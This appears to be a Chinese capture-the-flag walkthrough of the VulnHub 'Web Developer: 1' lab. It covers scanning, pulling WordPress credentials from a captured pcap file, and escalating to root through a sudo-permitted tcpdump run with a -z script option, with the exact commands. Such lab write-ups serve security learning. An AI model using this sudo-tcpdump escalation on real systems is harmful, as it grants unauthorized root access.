当前位置: 首页 > article >正文

vulnhub-Web Developer 1靶机

vulnhub:Web Developer: 1 ~ VulnHub

导入靶机,放在kali同网段,扫描

image-20240927105502127

靶机在192.168.114.129,扫描端口

image-20240927105531584

有网站服务,访问

image-20240927105614112

没什么东西,扫目录

image-20240927105857018

真不少,访问一下,也只是一些普通的Wordpress的页面,换个字典再扫一次

image-20240927110129801

这次多出来一个ipdata目录

image-20240927110151616

里面有个cap文件,下载

image-20240927110440782

在里面找到了账号密码

webdeveloper:Te5eQg&4sBS!Yr$)wf%(DcAd

登录wordpress

image-20240927110929501

靶机似乎有点问题,我这里跳过获取Wordpress的shell,请自行参考别的wp

webdeveloper:MasterOfTheUniverse

登录

image-20240927113845080

根据sudo -l,我们可以运行tcpdump

image-20240927113925849

查看提权网站的使用方式

COMMAND='ls -al /root'

TF=$(mktemp)

echo "$COMMAND" > $TF

chmod +x $TF

sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF

image-20240927114206130

执行完成后,再开一个终端,执行命令

nc -v -z -n -w 1 127.0.0.1 1

image-20240927114407300

可以看到原来的终端执行了ls -al /root命令,所以我们只需要替换命令就可以查看flag

image-20240927114357740

COMMAND='cat /root/flag.txt'

TF=$(mktemp)

echo "$COMMAND" > $TF

chmod +x $TF

sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF


http://www.kler.cn/news/340259.html

相关文章:

  • 向量数据库|第1期|从零开始学习
  • Python-Learning
  • 红帽7—Mysql路由部署
  • nginx问题解决-nginx代理数据库端口
  • 力扣34.在排序数组中查找元素的第一个和最后一个位置(二分查找)
  • GAMES104:16 游戏引擎的玩法系统:基础AI-学习笔记
  • 探索Python中的装饰器模式
  • LeetCode 189. Rotate Array 解题思路和python代码
  • 程序传入单片机的过程,以Avrdude为例分析
  • webm格式怎么转换成mp4?值得给你推荐的几种简单方法
  • 音频文件压缩,这些压缩操作不错
  • 2025 SSM与SpringBoot计算机毕业设计选题推荐【2025Java方向】
  • 初学Java基础Day12---数组的增删改查,可变参数 Arrays工具类
  • 自学数据库-MYSQL
  • 案例-博客页面简单实现
  • 使用C#和WCF创建并托管简单服务的指南
  • 儿童(青少年)可以参加哪些含金量高的比赛?
  • C++关于树的基础知识
  • 线性回归详解
  • SpringBoot项目打成jar包,在其他项目中引用